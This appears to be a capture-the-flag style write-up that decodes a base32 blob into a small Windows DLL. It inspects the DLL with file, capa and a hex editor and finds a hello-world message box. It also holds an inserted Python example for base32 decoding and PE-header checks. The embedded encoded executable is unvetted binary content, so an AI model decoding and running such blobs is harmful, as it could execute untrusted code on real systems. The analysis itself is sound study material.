GWK43TMFTWKQTPPBAQAVKTIVJDGMROMRWGYAAAEUAF6X3TORSF65DZOBSV62LOMZXV6ZDFON2HE33ZL5WGS43UAAAEQADNMVWXGZLUAAADKAC7MV4GGZLQORPWQYLOMRWGK4RUL5RW63LNN5XAAVSDKJKU4VCJJVCTCNBQFZSGY3AAAA4AAX3JNZUXI5DFOJWQAOIAL5UW42LUORSXE3K7MUAECAC7ONSWQX3GNFWHIZLSL5SGY3AADEAF6Y3PNZTGSZ3VOJSV63TBOJZG6527MFZGO5QAAA2QAX3JNZUXI2LBNRUXUZK7NZQXE4TPO5PWK3TWNFZG63TNMVXHIAAAGYAF62LONF2GSYLMNF5GKX3PNZSXQ2LUL52GCYTMMUAAAJAAL5SXQZLDOV2GKX3PNZSXQ2LUL52GCYTMMUABOAC7MNSXQ2LUAAAGC4DJFVWXGLLX
NFXC2Y3SOQWXE5LOORUW2ZJNNQYS2MJNGAXGI3DMACYQKVLONBQW4ZDMMVSEK6DDMVYHI2LPNZDGS3DUMVZAAADRAVJWK5CVNZUGC3TENRSWIRLYMNSXA5DJN5XEM2LMORSXEAA2AJDWK5CDOVZHEZLOORIHE33DMVZXGAEQAVKGK4TNNFXGC5DFKBZG6Y3FONZQAAEJANEXGUDSN5RWK43TN5ZEMZLBOR2XEZKQOJSXGZLOOQAE6BCROVSXE6KQMVZGM33SNVQW4Y3FINXXK3TUMVZAAGYCI5SXIQ3VOJZGK3TUKBZG6Y3FONZUSZAAD4BEOZLUIN2XE4TFNZ2FI2DSMVQWISLEAAAOYASHMV2FG6LTORSW2VDJNVSUC42GNFWGKVDJNVSQAZQDJFXGS5DJMFWGS6TFKNGGS43UJBSWCZAAQIBUS42EMVRHKZ3HMVZFA4TFONSW45AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALCGN7IRHOMQF3777777YAAAAAAAIAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIADAAAAAAYAAAIAAAAAAAAAAAAAAAAAAAAAAAACAACAAAAAMAA
ACAAAAAAAAAAAAAAAAAAAAAAAAAQACIEAAAEQAAAABQEAAAAPUAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAHQ7XQ3LMEB3GK4TTNFXW4PJHGEXDAJZAMVXGG33ENFXGOPJHKVKEMLJYE4QHG5DBNZSGC3DPNZST2J3ZMVZSOPZ6BUFDYYLTONSW2YTMPEQHQ3LMNZZT2J3VOJXDU43DNBSW2YLTFVWWSY3SN5ZW6ZTUFVRW63J2MFZW2LTWGETSA3LBNZUWMZLTORLGK4TTNFXW4PJHGEXDAJZ6BUFCAIB4ORZHK43UJFXGM3ZAPBWWY3TTHURHK4TOHJZWG2DFNVQXGLLNNFRXE33TN5THILLDN5WTUYLTNUXHMMZCHYGQUIBAEAQDY43FMN2XE2LUPE7A2CRAEAQCAIBAHRZGK4LVMVZXIZLEKBZGS5TJNRSWOZLTHYGQUIBAEAQCAIBAEA6HEZLROVSXG5DFMRCXQZLDOV2GS33OJRSXMZLMEBWGK5TFNQ6SOYLTJFXHM33LMVZCOIDVNFAWGY3FONZT2J3GMFWHGZJHEAXT4DIKEAQCAIBAEA6C64TFOF2WK43UMVSFA4TJOZUWYZLHMVZT4DIKEAQCAIB4F5ZWKY3VOJUXI6J6BUFCAIB4F52HE5LTOREW4ZTPHYGQUPBPMFZXGZLNMJWHSPQNBIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAIQAQAAAKGALDAMBQJAYF2MDSGCADBDRQTQYKUMFYGDDDBVBQ4IYPAMH6GAETCFBRD4YWCMLNGGQDDKRRXEYRWMSHGJKDE5JSPIZJGMUYGKSTFZZS54ZCEMZMGM5DGVJTNUZ5EM7EGORTJYBU7I2C6NJYGVBTKSRVLU2WWNLRGV3TK7JVQM2YSNMQGWLTLHRVUU22YNNTGW5DLQRVZI25ENO6GXTTL3BV6I27YNIGGYLDMJRWGY3D6NS6GZWTM5RWQM3JSNWTG3ODNYZW5E3O6NX3GYATO6BXDQ4DYODNHCQDRRRY2U4OYOHSHD4DR7RYAQ4QUOIQHESTSORZIE4UOOKZHFRTTSZZ3A47YOIPHLNTV6Z2AU5R4OZHHMWDWPZ3KM5VQO3LHOATXHR34A56KO74HMDDYDZ4XA6MCPGJHQCT2DZ5DA6SCPJWHU7T23R5O46YAPMOHWLT3OJ5YA65GPO5HXRT32J55467KPP3HUAT4BZ6BU7BGPQZHYUT4AAAAAQAAABIAAAAA4BQUQYKQMEMGKIDFGBS6AZAQM2YGZ4DNBBWTQ3KANV4G3ADMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA===

It looks base32 encoded, so I dropped it into CyberChef and downloaded the output to a file, which was automatically named download.exe.

CyberChef input and output
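The blob above has the two giveaways of base32: an alphabet of A-Z and 2-7, and trailing "=" padding. The added example below, which is not from the write-up, CyberChef or the challenge, does the same decode in Python in a way that tolerates the line breaks a pasted dump picks up, and then checks the result for the MZ/PE structure that `file` reported, pulling out the machine type and the DLL flag from the COFF header. The bytes it decodes are a constructed 88-byte header stub built by build_sample_pe_stub, so its hash is not the hash of the real download.exe.

```python
import base64
import hashlib
import struct
import textwrap

MACHINES = {0x14C: "i386", 0x8664: "x86-64", 0xAA64: "arm64"}
IMAGE_FILE_DLL = 0x2000          # COFF Characteristics bit that makes `file` say "(DLL)"


def decode_base32_blob(text):
    """Decode base32 as pasted from a dump: drop whitespace, upper-case, restore '=' padding."""
    cleaned = "".join(text.split()).upper()
    cleaned += "=" * (-len(cleaned) % 8)       # base32 works in 8-character groups
    return base64.b32decode(cleaned)


def identify_pe(data):
    """Describe a PE image (machine, DLL flag, section count, sha256) or return None if not PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)        # offset of the "PE\0\0" signature
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (machine, nsections, _ts, _symtab, _nsyms,
     _opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    return {"machine": MACHINES.get(machine, hex(machine)),
            "is_dll": bool(characteristics & IMAGE_FILE_DLL),
            "sections": nsections,
            "sha256": hashlib.sha256(data).hexdigest()}


def build_sample_pe_stub():
    """Construct a DOS header + PE signature + COFF header (sample data, not a runnable binary)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                    # e_lfanew points right after the DOS header
    # Characteristics 0x2102 = EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL; machine 0x14C = i386.
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 0xE0, 0x2102)
    return bytes(dos) + b"PE\0\0" + coff


# Constructed blob: the stub base32-encoded and wrapped onto 64-column lines, as a dump would be.
SAMPLE_BLOB = "\n".join(textwrap.wrap(base64.b32encode(build_sample_pe_stub()).decode(), 64))


if __name__ == "__main__":
    decoded = decode_base32_blob(SAMPLE_BLOB)
    print(f"decoded {len(decoded)} bytes")
    print(identify_pe(decoded))
```

Checking the decoded bytes before writing them to disk is the point: a wrong alphabet or a dropped padding character produces garbage that still "decodes", and the MZ/PE check catches that immediately.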

shanna@ubuntu:~/Downloads$ file download.exe 
download.exe: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

shanna@ubuntu:~/Downloads$ capa-v6.1.0-linux/capa -vv download.exe 
md5           f177ed1822bbdda18fcd143b6fd60b0f                                                               
sha1          42d234cc44c71d18c80e7b66370c1256d313c6fb
sha256         6334b111f4d93ebb11b9481f71a4a0122021bd0772f9cef0b11b8ed37dbfde2d
path          /home/shanna/Downloads/download.exe
timestamp        2023-10-30 22:48:00.182452
capa version      6.1.0
os           windows
format         pe
arch          i386
extractor        VivisectFeatureExtractor
base address      0x10000000
rules          /tmp/_MEI3PAOGc/rules
function count     39
library function count 26
total feature count   846

contain loop (3 matches, only showing first match of library rule)
author [email protected]
scope  function
function @ 0x10001000
 or:
  characteristic: tight loop @ 0x10001130

encode data using XOR
namespace data-manipulation/encoding/xor
author   [email protected]
scope   basic block
att&ck   Defense Evasion::Obfuscated Files or Information [T1027]
mbc    Defense Evasion::Obfuscated Files or Information::Encoding-Standard Algorithm [E1027.m02], Data::Encode Data::XOR [C0026.002]
basic block @ 0x10001130 in function 0x10001000
 and:
  characteristic: tight loop @ 0x10001130
  characteristic: nzxor @ 0x10001138, 0x1000114B
  not: = filter for potential false positives
   or:
    or: = unsigned bitwise negation operation (~i)
     number: 0xFFFFFFFF = bitwise negation for unsigned 32 bits
     number: 0xFFFFFFFFFFFFFFFF = bitwise negation for unsigned 64 bits
    or: = signed bitwise negation operation (~i)
     number: 0xFFFFFFF = bitwise negation for signed 32 bits
     number: 0xFFFFFFFFFFFFFFF = bitwise negation for signed 64 bits
    or: = Magic constants used in the implementation of strings functions.
     number: 0x7EFEFEFF = optimized string constant for 32 bits
     number: 0x81010101 = -0x81010101 = 0x7EFEFEFF
     number: 0x81010100 = 0x81010100 = ~0x7EFEFEFF
     number: 0x7EFEFEFEFEFEFEFF = optimized string constant for 64 bits
     number: 0x8101010101010101 = -0x8101010101010101 = 0x7EFEFEFEFEFEFEFF
     number: 0x8101010101010100 = 0x8101010101010100 = ~0x7EFEFEFEFEFEFEFF

contains PDB path
namespace executable/pe/pdb
author   [email protected]
scope   file
regex: /:\\.*\.pdb/
 - "C:\\Users\\john\\Downloads\\hello-world-dll-master\\hello-world-dll-master\\Release\\x86\\hello-world.pdb" @ file+0x1774

create thread
namespace host-interaction/thread/create
author   [email protected], [email protected], [email protected], [email protected]
scope   basic block
mbc    Process::Create Thread [C0038]
basic block @ 0x10001199 in function 0x10001190
 or:
  and:
   os: windows
   or:
    api: kernel32.CreateThread @ 0x100011A8

It's a DLL file, so I looked at it in dnSpy and a hex editor: 1C2A 02 4D 65 73 73 61 67 65 42 6F 78 41 00 55 53 45 52 33 32 2E 64 6C 6C .MessageBoxA.USER32.dll

It pops open a message box, easiest way